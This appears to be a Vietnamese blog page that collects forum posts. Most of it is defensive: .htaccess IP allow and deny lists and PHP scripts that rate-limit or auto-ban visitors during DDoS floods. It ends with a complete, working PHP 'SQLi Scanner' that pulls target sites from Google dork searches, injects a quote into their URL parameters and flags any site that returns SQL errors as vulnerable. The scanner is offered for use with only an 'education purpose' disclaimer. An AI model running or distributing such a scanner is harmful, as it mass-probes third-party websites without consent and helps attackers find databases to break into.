182.236.112.0/22 allow from 182.237.20.0/22  allow from 183.81.0.0/17 allow from 183.90.160.0/21 allow from 183.91.0.0/19 allow from 183.91.160.0/19 allow from 202.0.79.0/24 allow from 202.4.168.0/24 allow from 202.4.176.0/24 allow from 202.6.2.0/24 allow from 202.6.96.0/23 allow from 202.9.79.0/24 allow from 202.9.80.0/24 allow from 202.9.84.0/24 allow from 202.37.86.0/23 allow from 202.43.108.0/22 allow from 202.44.137.0/24 allow from 202.47.87.0/24 allow from 202.47.142.0/24 allow from 202.52.39.0/24 allow from 202.55.132.0/22 allow from 202.56.57.0/24 allow from 202.58.245.0/24 allow from 202.59.238.0/23 allow from 202.59.252.0/23 allow from 202.60.104.0/21 allow from 202.74.56.0/24 allow from 202.74.58.0/23 allow from 202.78.224.0/21 allow from 202.79.232.0/21 allow from 202.87.212.0/22 allow from 202.92.4.0/22 allow from 202.93.156.0/22 allow from 202.94.82.0/24 allow from 202.94.88.0/23 allow from 202.124.204.0/24 allow from 202.130.36.0/23 allow from 202.134.16.0/21 allow from 202.134.54.0/24 allow from 202.151.160.0/20 allow from 202.158.244.0/22 allow from 202.160.124.0/23 allow from 202.172.4.0/23 allow from 202.191.56.0/22 allow from 203.8.127.0/24 allow from 203.8.172.0/24 allow from 203.34.144.0/24 allow from 203.77.178.0/24 allow from 203.79.28.0/24 allow from 203.89.140.0/22 allow from 203.99.248.0/22 allow from 203.113.128.0/19 allow from 203.113.160.0/19 allow from 203.119.8.0/22 allow from 203.119.36.0/22 allow from 203.119.44.0/22 allow from 203.119.58.0/23 allow from 203.119.60.0/22 allow from 203.119.64.0/21 allow from 203.119.72.0/22 allow from 203.128.240.0/21 allow from 203.160.0.0/23 allow from 203.160.96.0/21 allow from 203.161.178.0/24 allow from 203.162.0.0/21 allow from 203.162.8.0/21 allow from 203.162.16.0/20 allow from 203.162.32.0/19 allow from 203.162.64.0/18 allow from 203.162.128.0/20 allow from 203.162.144.0/20 allow from 203.162.160.0/19 allow from 203.162.192.0/18 allow from 203.163.128.0/18 allow from 203.170.26.0/23 allow from 203.171.16.0/20 allow from 203.176.160.0/21 allow from 203.189.28.0/22 allow from 203.190.160.0/20 allow from 203.191.8.0/21 allow from 203.191.48.0/21 allow from 203.195.0.0/18 allow from 203.201.56.0/22 allow from 203.205.0.0/18 allow from 203.209.180.0/22 allow from 203.210.128.0/18 allow from 203.210.192.0/18 allow from 210.2.64.0/18 allow from 210.86.224.0/20 allow from 210.211.96.0/19 allow from 210.245.0.0/19 allow from 210.245.32.0/19 allow from 210.245.64.0/18 allow from 218.100.10.0/24 allow from 218.100.14.0/24 allow from 218.100.60.0/24 allow from 220.231.64.0/18 allow from 221.121.0.0/18 allow from 221.132.0.0/18 allow from 221.133.0.0/19 allow from 222.252.0.0/14 allow from 223.27.104.0/21

Save lại và upload lên host xong CHMOD 644 .

Kết quả: tất cả ip không nằm trong list được phép ( allow ) trong file .htaccess thì sẽ không truy cập được vào site bạn cũng như các tool ddos không thể kết nối đến site bạn. Dĩ nhiên là không có gì tuyệt đối nhé. Chứ BOTNET nó chỉ cần 1 lần connect server bạn phải - Deny 1 lần thế đủ xỉu.

Nếu bạn muốn làm ngược lại - nghĩa là cho phép tất cả truy cập loại trừ những IP không mong muốn thì nội dung của file

RewriteEngine on ErrorDocument 404 /404.html <Files ".htaccess"> allow from all </Files> order deny,allow allow from all  deny from 3.0.0.0/8 deny from 4.0.0.0/8 deny from 6.0.0.0/8 deny from 7.0.0.0/8 deny from 8.0.0.0/8 deny from 9.0.0.0/8 deny from list IP mà bạn muốn chặn

Sưu tầm

Cách chống doss khá hiệu quả

Share lại cách chống ddos này xem mà áp dụng nhé

Đầu tiên tạo file " chongddos.php "
<?php $cookie = $_COOKIE['yourcookie']; $othercookie = $_COOKIE['yourothercookie']; $othercookie = $_COOKIE['1211598493']; $othercookie = $_COOKIE['2c07863737b385b4c3567f0ecfa6d480']; $othercookie = $_COOKIE['3bc52aba5f6ed8a19cfafdc777ad1b1f']; if($cookie && $othercookie > 0) $iptime = 20; //so giay toi thieu giua cac lan truy cap. else $iptime = 10; // so giay toi thieu cho moi lan truy cap cho tat ca moi nguoi  $ippenalty = 60; // So giay truoc khi nguoi truy cap dc phep truy cap lai  if($cookie && $othercookie > 0)$ipmaxvisit = 30; //toi da truy cap tho $iptime else $ipmaxvisit = 20; // toi da cho moi lan truy cap $iptime  $iplogdir = "./iplog/"; $iplogfile = "iplog.dat"; $oldtime = 0; if (file_exists($iplogdir.$ipfile)) $oldtime = filemtime($iplogdir.$ipfile); $time = time(); if ($oldtime < $time) $oldtime = $time; $newtime = $oldtime + $iptime; if ($newtime >= $time + $iptime*$ipmaxvisit) { touch($iplogdir.$ipfile, $time + $iptime*($ipmaxvisit-1) + $ippenalty); $oldref = $_SERVER['HTTP_REFERER']; header("HTTP/1.0 503 Service Temporarily Unavailable"); header("Content-Type: text/html"); echo "<html><body bgcolor=#999999 text=#ffffff link=#ffff00> <font face='Verdana, Arial'><p><b> <h1>Temporary Access Denial</h1>Too many quick page views by your IP address (more than ".$ipmaxvisit." visits within ".$iptime." seconds).</b> "; echo "<br />Please wait ".$ippenalty." seconds and reload. Warning by KentMaster</p></font></body></html>"; touch($iplogdir.$iplogfile); //create if not existing $fp = fopen($iplogdir.$iplogfile, "a"); $yourdomain = $_SERVER['HTTP_HOST']; if ($fp) { $useragent = "<unknown user agent>"; if (isset($_SERVER["HTTP_USER_AGENT"])) $useragent = $_SERVER["HTTP_USER_AGENT"]; fputs($fp, $_SERVER["REMOTE_ADDR"]." ".date("d/m/Y H:i:s")." ".$useragent."\n"); fclose($fp); $yourdomain = $_SERVER['HTTP_HOST'];  if($_SESSION['reportedflood'] < 1 && ($newtime < $time + $iptime + $iptime*$ipmaxvisit)) @mail('ngothaiduong.info@gmail.com', 'Website is being flooded-DDOS from address '.$cookie.' ' .$_SERVER['REMOTE_ADDR'],''.$yourdomain.' are attacked refuse services from IP addresses '.$_SERVER['REMOTE_ADDR'].' attack to '.$yourdomain.$_SERVER['REQUEST_URI'].' Attaker is '.$oldref.' agent '.$_SERVER['HTTP_USER_AGENT'].' ' .$cookie.' '.$othercookie, "From: ".$yourdomain."\n"); $_SESSION['reportedflood'] = 1; } exit(); } else $_SESSION['reportedflood'] = 0; //echo("loaded ".$cookie.$iplogdir.$iplogfile.$ipfile.$newtim e); touch($iplogdir.$ipfile, $newtime); ?>

Trong đó , đổi địa chỉ email thành Email của admin hoặc ai quản lý host và domain cho forum .

- Upload file chongddos.php lên ngang hàng với index.php
- Mở các file cần bảo vệ : " index.php , showtheard.php , seach.php .... các file mà bọn nó qua đó có thể ddos mình đó . Chèn đoạn mã này sau thẻ < ?php
include 'chongddos.php';

- Sau đó tạo 1 thư mục có tên là /iplog/ và CHMOD là 777, bạn tạo tiếp 1 files
iplogfile.dat trong thư mục iplog và CHMOD là 666

Thế là xong .... Thử xem thế nào !

Dùng cái này có những lợi ích gì ?

- Cản ddos đc chút ít ( chả có cái gì chống được ddos cả )
- Gởi mail về thông báo khi bị ddos , IP thủ phạm ddos để có biện pháp xử lý .

Các bác tham khảo thêm trong mã file chongddos.php

Nice !

Auto lock ip khi bị ddos & attack

Default Code tự động lock ip khi bị ddos attack

Tránh được DDos bằng tools còn botnet thì chịu nha

đầu tiền lưu nội dung sau lưu lại với tên banip.php

Mã:
<?php$n = 5; / Chặn ip nếu 5 lần nhanh và liên tiếp truy cập vào 1 URL$ban = strpos($_SERVER['REQUEST_URI'], "vbshout.php")?0:1;$in = "\n".$_SERVER['REMOTE_ADDR']." - ".$_SERVER['REQUEST_URI'];$log = fopen('banip.log','a'); fwrite($log, $in); fclose($log);$list = file('banip.log',FILE_IGNORE_NEW_LINES &#124; FILE_SKIP_EMPTY_LINES);$last = count($list) - 1;if($last >1000) { $in = "Deny from all"."\n";$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock); }elseif($last > $n) { for($i = 1; $i < $n; $i++) if($list[$last - $i] != $list[$last]) $ban = 0;} else { $ban = 0; }if($ban) { $in = "Deny from ".$_SERVER['REMOTE_ADDR']."\n";$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock);}?>

vào file global.php nếu xài 4rum.
Cơ chế hoạt động
khi 1 ip gửi 1 request tới site của bạn. code sẽ tạo ra 1 file log ghi lại ip đó, và url mà ip đó truy cập.
Ví dụ : 113.22.70.69 - http://mydomain.com/4rum/index.php
nếu ip 113.22.70.69 truy cập nhanh và liên tiếp 5 lần vào cùng 1 url như trên thì code sẽ lock ip 113.22.70.69 bằng cách tạo ra 1 file htaccess và ghi lệnh deny from 113.22.70.69

Mã:
include 'banip.php';

Đoạn code tiếp theo

Mã:
if($last >1000) { $in = "Deny from all"."\n";

Khi 1 ip truy cập vào site. code sẽ ghi ip đó vào 1 dòng
Sau đó sẽ đếm tổng số dòng trong file log. nếu lớn hơn 1000 dòng trong 1 thời gian nhất định (Dấu hiệu bị tấn công bonet) thì sẽ ghi vào file htaccess lệnh deny from all
Các bạn có thể lập lịch xoá file htaccess và file log theo 1 thời gian quy định bằng cron job trong cpanel của host
Code:

Mã:
<?php if(file_exists('.htaccess')) unlink('.htaccess'); if(file_exists('banip.log')) unlink('banip.log'); ?>

Save đoạn code sau lại thành reset.php và up lên thư mục gốc. sau đó xài cron job để thực thi file reset.php theo 1 thời gian nhất định. Ví dụ 10 phút xoá file htaccess và file log 1 lần.

Code này chống ddos khá hiệu quả. nhưng với botnet thì thua vì khi có lệnh deny from all mặc dù apache sẽ ko kết nối đến cơ sở dữ liệu nhưng apache vẫn trả lời các request. . đó là trả về lỗi 403.
Khi apache phải trả lời hàng trăm ngàn reqest như thế các bạn biết điều gì sẽ xảy ra rùi đóa.

Các bác test thử rùi cho ý kiến nha. Em test thấy good. dùng tool tự ddos site mình. ddos đc vài giây là bị lock ip .

. Nguồn Sưu Tầm...

Thứ Ba, 15 tháng 3, 2011

PHP : Dork Scanner SQL Injection

<html>
<head>
<title>Masokis SQLi Scanner</title>
<style>
body{
background: #0F0F0F;
color: #F9F9F9;
font-family: monospace;
font-size: 12px;
}

input{
background: #0F0FCC;
border: 1px solid #00FFCC;
color: #00FFCC;
}

h2{
color: #55FFCC;
}

a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
a:hover{ color: #00FFCC; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }

</style>

</head>
<body align="center">

<?php
echo "<h2>SQLI Online Scanner</h2>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
echo "<input type='submit' value='  Let's Get Started!  '>";
echo "<hr><br />";

if($_POST['dork']) {

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

$i = 0;
$a = 0;
$b = 0;

while($b <= 900) {
$a = 0;
flush(); ob_flush();
echo "@ Pages: [ $b ]<br />";
echo "@ Dork: [ <b>".$_POST['dork']."</b> ]<br />";
echo "@ Google Scanner ! .<br />";
flush(); ob_flush();

if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "See something but not found??<br />";
flush(); ob_flush();
break;
}

preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Result of injection...<br />";
flush(); ob_flush();
while(1) {

if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>Yeah..Vulnerable ! </font><br />";
} else {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not Vulnerable..sorry! </font><br />";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Lets..scan other page.. <br />";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}

function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOW, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}

?>

</body>
</html>
<br> masokis[a]gmail.com</br><p>
<center> This tools for education purpose only !!!</center>

 
Design by mkha.hero